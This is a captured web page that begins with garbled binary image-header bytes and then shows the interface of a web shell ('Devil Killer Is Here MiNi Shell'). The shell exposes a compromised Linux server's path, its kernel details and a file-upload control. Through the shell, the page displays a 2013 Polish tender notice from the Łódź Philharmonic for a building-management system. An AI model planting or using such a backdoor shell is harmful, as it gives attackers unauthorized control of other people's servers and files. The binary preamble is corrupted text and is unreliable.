JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131205/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131205/503370-N-2013.html

<p class="kh_header"><b>Łódź: montaż systemu BMS (systemu zarządzania automatyką budynku) w zakresie przebudowy Filharmonii pod kątem montażu organów w ramach zadania pn.: Wykonanie i montaż organów współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 503370 - 2013; data zamieszczenia: 05.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Filharmonia Łódzka im. Artura Rubinsteina , ul. Narutowicza 20/22, 90-135 Łódź, woj. łódzkie, tel. 0-42 664 79 18, faks 0-42 664 79 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.filharmonia.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> montaż systemu BMS (systemu zarządzania automatyką budynku) w zakresie przebudowy Filharmonii pod kątem montażu organów w ramach zadania pn.: Wykonanie i montaż organów współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest montaż systemu BMS w zakresie przebudowy Filharmonii pod kątem montażu organów w ramach zadania pn.: Wykonanie i montaż organów współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013  

Zakres przedmiotu zamówienia :

Opracowanie dokumentacji projektowo-kosztorysowej wraz z niezbędnymi uzgodnieniami, opiniami, certyfikatami i pozwoleniami oraz wykonanie robót obejmujących budowę, instalację, uruchomienie i testowanie systemu BMS nadzorującego działanie istniejących instalacji wentylacji i klimatyzacji obsługujących salę koncertową budynku Filharmonii Łódzkiej wraz z przyległymi pomieszczeniami.

Zakres i treść dokumentacji projektowo - kosztorysowej oraz przebieg realizacji robót  powinny być ściśle dostosowane do specyfiki i charakteru obiektu. Dokumentacja projektowo - kosztorysowa oraz realizacja robót  powinna spełniać wymagania określone w części Programu Funkcjonalno - Użytkowego dotyczącej tego systemu a będącej załącznikiem do niniejszego opisu.

Przedmiot zamówienia obejmuje:

1. Wykonanie projektu, oraz montaż systemu BMS monitorującego i sterującego  istniejącym systemem klimatyzacji i wentylacji w Filharmonii Łódzkiej działającym w oparciu o sterowniki Honeywell Excel 100 połączonych magistralą C-Bus.
 Pełnym sterowaniem i monitorowaniem muszą być objęte:

- centrale wentylacyjne - szt. 3 (10KNW, 2KNW i FKNW):
- powiązane z w/w centralami przepustnice strefowe (zgodnie z dokumentacją 
 techniczną);
- węzeł cieplny (w zakresie ciepła technologicznego central wentylacyjnych);
- agregat wody lodowej;

Ponadto system BMS powinien zapewnić możliwość pełnego sterowania i monitorowania w przyszłości pozostałych central wentylacyjnych, których sterowniki są obecnie połączone magistralą C-Bus z centralami wymienionymi powyżej.

Monitorowaniem w pełnym zakresie muszą być objęte:

- praca chłodnic agregatu wody lodowej 
- praca pomp agregatu wody lodowej 
- praca instalacji przeciwzamrożeniowej 
- praca stacji uzdatniania wody 
- stan zasilania w/w układów wentylacji i klimatyzacji (monitorowanie za pomocą  
  dostarczonego i zainstalowanego analizatora sieci  elektrycznej, wyposażonego w 
  dedykowaną magistralę komunikacyjną - ModBus, LonWorks, BACnet, KNX);

Ponadto system BMS powinien w przyszłości zapewnić możliwość pełnego monitorowania stanu zasilania stacji abonenckiej RGnn zasilającej kompleks budynków Filharmonii Łódzkiej;
2. Dostawę sprzętu komputerowego obejmującego:

- komplet dedykowanych urządzeń wymaganych przez oprogramowanie BMS;
- 3 stacje operatorskie dla systemu BMS pracujące w sieci lokalnej Filharmonii Łódzkiej w 
  następującej konfiguracji:

a. 1 stanowisko z 2 monitorami 24 cale  z klawiaturą i myszką bezprzewodową;
b. 1 stanowisko z 1 monitorem 20 cali z klawiaturą i myszką bezprzewodową;
c. 1 stanowisko z 1 monitorem 20 cali z klawiaturą i myszką bezprzewodową
d. Laptop

- 2 drukarki laserowe Color.

Sprzęt komputerowy powinien pochodzić od wiarygodnego, sprawdzonego dostawcy, gwarantującego naprawę sprzętu komputerowego w czasie nie dłuższym niż 1 dzień roboczy od momentu zgłoszenia usterki w czasie trwania całej umowy. Kopie gwarancji na w/w sprzęt należy dołączyć do karty gwarancyjnej wykonanej instalacji BMS. Wszystkie urządzenia objęte zakresem umowy powinny pracować przez co najmniej 1 godzinę po zaniku zasilania podstawowego.

Lokalizacja poszczególnych urządzeń BMS (w tym stacji operatorskich) zostanie wskazana podczas obowiązkowej wizji lokalnej obiektu.
3. Dostawę, instalację i uruchomienie dedykowanego pakietu oprogramowania dla 
    systemu BMS;

4. Dostawę, instalację i uruchomienie oprogramowania umożliwiającego pełny dostęp do
    wykonanego systemu BMS z poziomu dowolnego komputera pracującego w sieci 
    Filharmonii Łódzkiej za pomocą dowolnej przeglądarki internetowej;

5. Wykonanie wszelkich niezbędnych, towarzyszących robót budowlanych (bruzdowanie,  
     naprawa tynków i sufitów podwieszanych, powiązane prace malarskie, wykonanie
     i uszczelnienie przejść ppoż. oraz inne prace wskazane przez Inwestora lub inspektora 
    nadzoru) w zakresie niezbędnym do prawidłowego funkcjonowania instalacji BMS;

6. Opracowanie i dostarczenie Inwestorowi przed rozpoczęciem prac szczegółowego  
    projektu wykonawczego wraz z niezbędnymi uzgodnieniami, opiniami, certyfikatami i 
    pozwoleniami wymaganymi dla tego typu robót; 
7. Wykonanie po zakończeniu robót szczegółowej dokumentacji powykonawczej oraz  
    czytelnych instrukcji obsługi i konserwacji systemu BMS (w języku polskim)    
    odpowiednich instrukcji stanowiskowych (w języku polskim);

8. Przeprowadzenie szkolenia wytypowanych przez Inwestora pracowników w zakresie 
    obsługi systemu BMS.

9. Wykonywanie w okresie gwarancji : 
    - nieodpłatnego serwisu i konserwacji systemu BMS; 
    - niezbędnych aktualizacji oprogramowania; 
    - szkoleń pracowników Filharmonii Łódzkiej oraz pracowników  firm z nią 
      wpółpracujących; 

10. Dostarczenie karty gwarancyjnej dla kompletnego systemu BMS wraz z dokumentami zawierającymi numery seryjne urządzeń, cenę poszczególnych elementów instalacji wytyczne producenta w zakresie przeglądów serwisowych oraz instrukcje 
      postępowania w przypadku wymiany uszkodzonego elementu (w języku polskim).

10. Obiekt po zakończonych pracach modernizacyjnych należy doprowadzić do stanu
      pierwotnego (m.in. poprzez uzupełnienie przejść pożarowych, poprawki 
      ogólnobudowlane i inne prace wskazane przez Inwestora lub Inspektora Nadzoru na etapie realizacji prac).
Charakterystyka systemu BMS:

Opis szczegółowy:

Realizacja systemu BMS dla wybranej części budynku Filharmonii Łódzkiej ma na celu zapewnienie stałego nadzoru służb technicznych nad instalacją klimatyzacji i wentylacji budynku a w szczególności pomieszczeń, w których zapewnienie stałej temperatury 
i wilgotności jest kluczowe do funkcjonowania Filharmonii (pomieszczenia monitorowane - pomieszczenie sali koncertowej i jej zaplecze techniczne).

System powinien zapewniać stały podgląd i monitorowanie w/w instalacji klimatyzacji 
i wentylacji, a w szczególności wszystkich wartości temperatur, wilgotności, alarmów oraz harmonogramów, stanu wszystkich czujników, elementów wykonawczych (zawory, siłowniki itp.) oraz pozostałych elementów, które dostępne są z poziomu panelu sterownika automatyki klimatyzacji.

System powinien zapewniać stały podgląd i monitorowanie stacji uzdatniania wody (wymiana elementów sterujących) oraz agregatu wody lodowej, powiązanych obwodów ciepła technologicznego oraz monitorowanie stanu powiązanych obwodów zasilania elektrycznego objętych projektem urządzeń wentylacji w klimatyzacji;

Stan wszystkich monitorowanych i sterowanych elementów powinien być zapisywany na komputerze centralnym systemu BMS.  Dane te powinny być dostępne za pomocą wykresów i tabel w czytelny sposób, umożliwiający szybką i jednoznaczną diagnostykę systemu oraz lokalizację awarii lub uszkodzenia. System powinien informować na bieżąco o wszelkich błędach oraz awariach za pomocą SMS-ów oraz komunikatów poczty elektronicznej (e-mail).
Lokalizacja wszystkich stanowisk zostanie wskazana przez Zamawiającego po podpisaniu umowy.
Oferowany system BMS powinien być oparty o urządzenia i dedykowane oprogramowanie uznanego i sprawdzonego dostawcy, które umożliwią bezpośrednie zarządzanie istniejącą siecią automatyki budynkowej, opartej o magistralę C-Bus (Honeywell).

Oprogramowanie BMS powinno spełniać następujące wymagania:
- Graficzny interfejs operatora powinien być w całości w języku polskim - włącznie 
  z wszystkimi komunikatami systemowymi.

Oferowany system BMS powinien również:

- Posiadać podgląd wszystkich stanów systemu klimatyzacji i wentylacji, agregatu wody 
  lodowej, stacji uzdatniania wody, powiązanych obwodów ciepła technologicznego, 
  stanów alarmowych oraz monitorowanie stanu zasilania elektrycznego instalacji 
  wentylacji i klimatyzacji mających wpływ na prawidłowe warunki środowiskowe w sali 
   z organami - wraz z interaktywnymi schematami technologicznymi.
- Posiadać podgląd logu zdarzeń i alarmów;
- Posiadać podprogram zarządzający alarmami;
- Mieć możliwość tworzenia podprogramów wspomagających pracę systemu klimatyzacji
   i wentylacji;
- Posiadać Managera programów czasowych i programów pomocniczych czasowo - 
  zdarzeniowych;
- Posiadać Managera trendów.
Oprogramowanie interfejsu operatora musi zapewniać dynamiczny dostęp do danych oraz pozwalać na wyświetlanie i modyfikowanie danych systemowych w czasie rzeczywistym;
Zarządzania wszystkich instalacji technicznych odbywać się powinno za pomocą hierarchicznie powiązanych grafik;

Podstawowym narzędziem do komunikacji i wydawania poleceń powinna być mysz komputerowa;

Oprogramowanie BMS powinno umożliwiać podłączenie funkcji oraz właściwości oprogramowania innych producentów z poziomu grafiki systemowej;

Operator powinien uzyskać dostęp do systemu wyłącznie po podaniu kodu identyfikatora i hasła kontrolnego;

Dostęp operatora do poszczególnych punktów / grafik / poziomów / funkcji systemu powinien być kontrolowany przez przypisaną mu hierarchię graficzną i jego przywileje;

Dane wyświetlane graficznie muszą być przypisywane niezależnie od adresu fizycznego sterownika / centralki z której pochodzą, kanału komunikacyjnego czy typu punktu; 

Grafiki powinny mieć możliwość programowania w czasie normalnej pracy systemu a poszczególne punkty - możliwość przypisania do wielu grafik. Grafiki muszą mieć również możliwość zobrazowania punktów wyliczanych i pseudo-punktów a także programowania od nich konkretnych zdarzeń. Każdy punkt fizyczny przypisany grafice powinien posiadać deskryptor alfanumeryczny w języku polskim.

Wartości punktów fizycznych i pseudo-punktów będą przechowywane i wyświetlane przez  system w czasie rzeczywistym z odpowiednimi deskryptorami, statusem lub wartością analogową i odpowiednią jednostką miary. Dla pokazania statusu poszczególnych punktów i stanów alarmowych będą wykorzystywane zmiany kolorów symboli graficznych oraz animacje.

Wszystkie punkty będą dynamicznie odświeżane w trybie on-line;

Operatorzy posiadający stosowne uprawnienia będą mieć możliwość bezpośredniej zmiany wartości punktów z poziomu stanowiska centralnego. Operacji tej można będzie dokonywać zarówno za pomocą myszki jak i poprzez klawiaturę;

Okno punktów cyfrowych (zarówno wejścia jak i wyjścia) powinno zawsze pokazywać aktualny stan danego punktu (np. pozycja siłownika zaworu: ZAMKNIĘTE / OTWARTE), a operator będzie miał możliwość wyboru dowolnego stanu i tym samym wysterowania fizycznego urządzenia odpowiadającego danemu punktowi (np. zamknięcia lub otwarcia przykładowego zaworu);
Okno punktów analogowych (zarówno wejścia jak i wyjścia) powinno pokazywać analogową wartość dziesiętną danego punktu (np. wartość temperatury zewnętrznej). Operator musi mieć możliwość zmiany tej wartości za pomocą myszki (strzałkami w górę / w dół) lub za pomocą klawiatury; 

Nowa wartość analogowa wprowadzona przez operatora będzie przekazywana do odpowiedniego sterownika, który w tym wypadku powinien zignorować wartość rzeczywistą (odczytywaną z czujnika lub wynikającą z algorytmu regulacji);

W celu umożliwienia pracy z systemem nawet mało doświadczonym operatorom BMS będzie wyposażony w rozbudowaną funkcję pomocy. Pomoc ta musi mieć formę dokumentu hipertekstowego zawierającego odwołania kluczowych słów do innych jego części. Wymagane jest by dokument był w języku polskim;

Oprogramowanie centralnego stanowiska nadzoru BMS zapewniać powinno użytkownikowi maksymalną elastyczność, tj. łatwe modyfikowanie i dostosowanie do specyficznych wymagań urządzeń technicznych zainstalowanych w budynku, zastosowanego oprogramowania oraz wewnętrznych procedur operacyjnych i podziału zadań personelu.

Zmiana konfiguracji systemu i parametrów programowych musi być możliwa podczas normalnej pracy systemu poprzez wybór odpowiednich poleceń z menu lub wprowadzenie ich z klawiatury;

Wymaga się, aby system miał możliwość implementacji oprogramowania opcjonalnego zapewniającego:
- zintegrowane zarządzanie utrzymaniem obiektu;
- kontrolę pracy operatorów;
- sterowanie oświetleniem;
- sterowanie grupowe;
- oprogramowanie do tworzenia aplikacji integracyjnych;

Wymagania w zakresie alarmów systemowych:

Oprogramowanie systemu centralnego sterowania i nadzoru musi przekazywać operatorowi wszystkie alarmy zgłaszane przez sterowniki i centralki. Komunikaty alarmowe muszą być wyświetlane wg swobodnie definiowanych priorytetów alarmów (jako pierwszy alarm pożarowy, drugi alarm bezpieczeństwa, itd.) w kolejności chronologicznej (pierwsze są komunikowane alarmy najwcześniej zgłoszone). 

Oprogramowanie systemowe musi zawierać:
- Identyfikator stanu alarmowego;
- Wartość analogową punktu lub jego status;
- Identyfikator punktu w języku polskim:
- Unikalny dla każdego punktu i jego stanu komunikat alarmowy, np. Wyłączenie  
  wentylatora w związku ze zbyt wysokim ciśnieniem w kanale wylotowym.

Potwierdzanie alarmów może odbywać się tylko przez upoważnionego operatora;

Oprogramowanie systemowe musi zapewniać:

- Możliwość zmiany barwy elementu graficznego reprezentującego dany punkt;
- Funkcję ponownego alarmowania po wykryciu zdefiniowanego zdarzenia lub czasu;
- Możliwość przypisania alarmów tylko do poszczególnych operatorów lub stacji 
  operatorskich;
- Możliwość przypisania alarmów do numerów telefonów, wysyłania SMS-ów do 
  operatorów sieci komórkowych oraz e-maili w/g dowolnej konfiguracji treści SMSa / e-
  maila;
- Widoczny na monitorze wskaźnik niepotwierdzonych alarmów powiadamiający 
  operatora o alarmach w obrębie systemu; 
- Możliwość zmiany barwy symbolu graficznego punktu będącego w alarmie (np. symbole 
  punktów będących w alarmie niepotwierdzonym migają na czerwono, zaś po   
  potwierdzeniu alarmu powinny przybierać barwę czerwoną);
- Możliwość generowania komunikatów limitu czasu pracy (np. limit czasu pracy urządzeń        pomiędzy remontami), które powinny być prezentowane i przetwarzane jak komunikaty alarmowe;
- Zaawansowane funkcje zarządzania konserwacją urządzeń w oparciu o liczniki pracy;
Wymagania w zakresie raportów:

Jako standard musi być dostępny krótki raport z punktów na każdym poziomie penetracji (urządzenie, budynek, strefa, system), obejmujący jedynie dane dotyczące punktów na tym poziomie lub poniżej. Raport ten musi zawierać aktualną wartość analogową i / lub status punktów, stan alarmowy oraz deskryptory w języku polskim dla wszystkich punktów. Raport ten ma być dostępny w następujących wariantach:

- dla wszystkich punktów;
- tylko dla punktów w stanie alarmu;
- tylko dla punktów z ustaloną wartością / stanem;
- tylko dla punktów analogowych lub cyfrowych;
- tylko dla wejść lub wyjść;
- tylko dla punktów z zablokowanym alarmowaniem;

Standardowe raporty trendów dynamicznych mają obrazować zachowanie się tych punktów w czasie rzeczywistym. Raport ten musi umożliwiać przedstawianie rejestrowanych danych w formie liczb i w postaci wykresów liniowych. Wykresy graficzne pozwolą na pokazanie danych dla każdego rejestrowanego punktu w innym kolorze. Zmieniające się w czasie wartości / stany punktów będą przetwarzane, skalowane i dynamicznie dodawane do wyświetlanego wykresu;

Wymagania w zakresie trendów:

Raporty trendów mają umożliwiać operatorowi wybranie logicznych układów punktów, które byłyby rejestrowane w wybieranych interwałach czasowych. 

Każdy z trendów punktów fizycznych i programowych dostępnych dla dowolnego sterownika musi być archiwizowany do plików centralnego komputera w wybieranym przez użytkownika interwale czasowym; 

Każdy z plików archiwizowania trendów powinien posiadać wybieralną przez operatora długość czasu rejestracji (np. dzień, tydzień, miesiąc lub rok);

Wartości / statusy punktów określonego trendu mają być wyświetlane lub drukowane indywidualnie lub w grupach logicznych;

System musi umożliwiać wielokrotne, jednoczesne przypisanie tych samych punktów do różnych grup;

System musi zapewniać eksport danych z trendów w formacie CSV, do dalszego przetwarzania (np. analizy statystycznej);

Wymagania w zakresie masek graficznych:

Oprogramowanie centralnego stanowiska nadzoru BMS musi umożliwiać użytkownikowi swobodne tworzenie i / lub modyfikację grafik oraz przypisywanie i pozycjonowanie dowolnego punktu lub grupy punktów (niezależnie od sterownika / centralki, z której pochodzą) w obrębie dowolnej grafiki;

Dany punkt musi posiadać możliwość wielokrotnego przypisania do różnych grafik;

System powinien posiadać własne zintegrowane narzędzie do pisania skryptów oraz tworzenia grafik i animacji;

Tworzenie grafik powinno być możliwe w czasie normalnej pracy systemu; 

Proces tworzenia masek graficznych nie powinien wymagać przerywania pracy systemu lub stacji operatora i nie powinien mieć wpływu na archiwizowanie punktów i alarmów.

Narzędzia do tworzenia grafik powinno zawierać biblioteki najczęściej wykorzystywanych symboli graficznych;

Inne wymagane cechy systemu BMS:
- Możliwość współpracy w pełnym zakresie ze standardowymi protokołami otwartymi - w 
  tym: LonWorks, BACnet, OPC, Modbus, KNX;
- Obsługa magistrali sterowników C-BUS firmy Honeywell;
- Obsługa centrali sygnalizacji pożaru Esser;
- Obsługa systemu sygnalizacji włamania i napadu SATEL Integra;
- Standardowy protokół sieciowy TCP/IP na platformie Ethernet;
- Obsługa przeglądarek internetowych: Microsoft Explorer, Firefox, Chrome oraz 
  przeglądarek w systemach mobilnych (Android, iOS, BlackBerry).
- Możliwość prostej rozbudowy w zakresie przyszłego monitorowania innych instalacji i 
  systemów budynkowych zainstalowanych obecnie w Filharmonii Łódzkiej.


Zamawiający wymaga aby wszystkie dostarczone urządzenia były fabrycznie nowe i wolne od wad fizycznych i prawnych. Urządzenia te powinny być pierwszego gatunku i muszą spełniać wszelkie wymagania jakościowe odnośnie takich urządzeń.

Zamawiający wymaga, aby dostarczony sprzęt posiadał wszystkie wymagane przepisami certyfikaty, atesty, świadectwa dopuszczenia do użytkowania lub inne dokumenty jednoznacznie potwierdzające, że sprzęt i urządzenia spełniają wymagane prawem przepisy i normy.

Wszystkie dostarczone urządzenia powinny posiadać certyfikat CE. 

Wykonawca udzieli Zamawiającemu minimum 36-miesięcznej pisemnej gwarancji na wykonane roboty budowlane, dostarczone urządzenia, sprzęt i oprogramowanie. Okres rękojmi za wady jest równy okresowi gwarancji udzielonej przez Wykonawcę.

Zamawiający wymaga (niezależnie od gwarancji producentów) udzielenia przez Wykonawcę minimum 36-miesięcznej, pisemnej gwarancji na dostarczony, zainstalowany sprzęt, urządzenia i oprogramowanie.

Wykonawca ma obowiązek dokonania przed złożeniem oferty wizji lokalnej obiektu i dokładnego zapoznania się z posiadaną przez Inwestora dokumentacją techniczną oraz ze stanem faktycznym obiektu celem dokładnego oszacowania zakresu prac objętych niniejszym postępowaniem. Chęć odbycia wizji lokalnej Wykonawca powinien zgłosić do Zamawiającego w formie faxu, maila lub pisemnie wraz z podaniem terminu, w którym chciałby zapoznać się z obiektem dokumentacją w zakresie związanym z przedmiotem przetargu. Zamawiający zastrzega sobie prawo do zmiany ww. terminu, jeżeli będzie on kolidował z wydarzeniami i zajęciami odbywającymi się w siedzibie Zamawiającego. 
Dokumentacja techniczna dotycząca istniejących w budynku Filharmonii Łódzkiej instalacji, w tym instalacji: wentylacji i klimatyzacji, wody lodowej, ciepła technologicznego, stacji uzdatniania wody i nawilżaczy, stacji abonenckiej NN, systemów AKPiA jest dostępna do wglądu w siedzibie Zamawiającego.

Zapoznanie się z niniejszym opisem przedmiotu zamówienia i posiadaną przez Zamawiającego dokumentacją techniczną obiektu nie zwalnia potencjalnego Wykonawcy z obowiązku przeprowadzenia wnikliwej wizji lokalnej obiektu i oceny własnej rzeczywistego zakresu robót - jakiekolwiek niezgodności w/w dokumentów ze stanem faktycznym obiektu nie mogą być podstawą do ewentualnej późniejszej zmiany warunków zawartej umowy.


Wymagania formalne:

1.	Autoryzacja Producenta uprawniająca do projektowania, montażu, instalacji, konserwacji  i serwisu oferowanego systemu BMS;
2.	Deklaracja dostawcy / producenta sprzętu BMS o dostępności zaproponowanych rozwiązań lub ich zamienników w okresie min. 10 lat od dnia podpisania umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.31.56.00-4, 48.15.10.00-1, 48.78.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w kwocie 4 000 (słownie: cztery tysiące) zł. 
Wadium może być wniesione w wybranej przez Wykonawcę formie:
a/ pieniądzu na rachunek bankowy 14 1030 1205 0000 0000 8790 6035
b/ poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym , że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c/ gwarancjach bankowych;
d/ gwarancjach ubezpieczeniowych;
e/ poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu PARP (Dz. U. 2007 Nr 42 poz. 275)
Wadium wnosi się przed upływem terminu składania ofert.
W przypadku wadium wnoszonego w pieniądzu, kwota wadium musi znajdować się na rachunku Zamawiającego przed upływem terminu składnia ofert. 

Wadium złożone w innej formie niż pieniężnej, należy złożyć /w formie oryginału/ do oferty. 
Jeżeli Wykonawca będzie żądał zwrotu dokumentu potwierdzającego złożenie wadium, dokument ten powinien być złożony wraz z ofertą, ale nie połączony z nią w sposób trwały, który uniemożliwiałby jego zwrot bez naruszenia integralności oferty. 
1) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy: 
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, nr zamówienia nadany przez Zamawiającego, nazwę zamówienia; 
b) określenie wierzytelności, która ma być zabezpieczona gwarancją; 
c) kwotę gwarancji;
d) termin ważności gwarancji (nie może być krótszy niż termin związania Wykonawcy złożoną przez 
niego ofertą); 
e) bezwarunkowe i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze 
pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
-	odmówił podpisania umowy na warunkach określonych w ofercie, lub 
-	nie wniósł zabezpieczenia należytego wykonania umowy, lub 
-	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, lub
-	jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 u.p.z.p., nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 tej ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
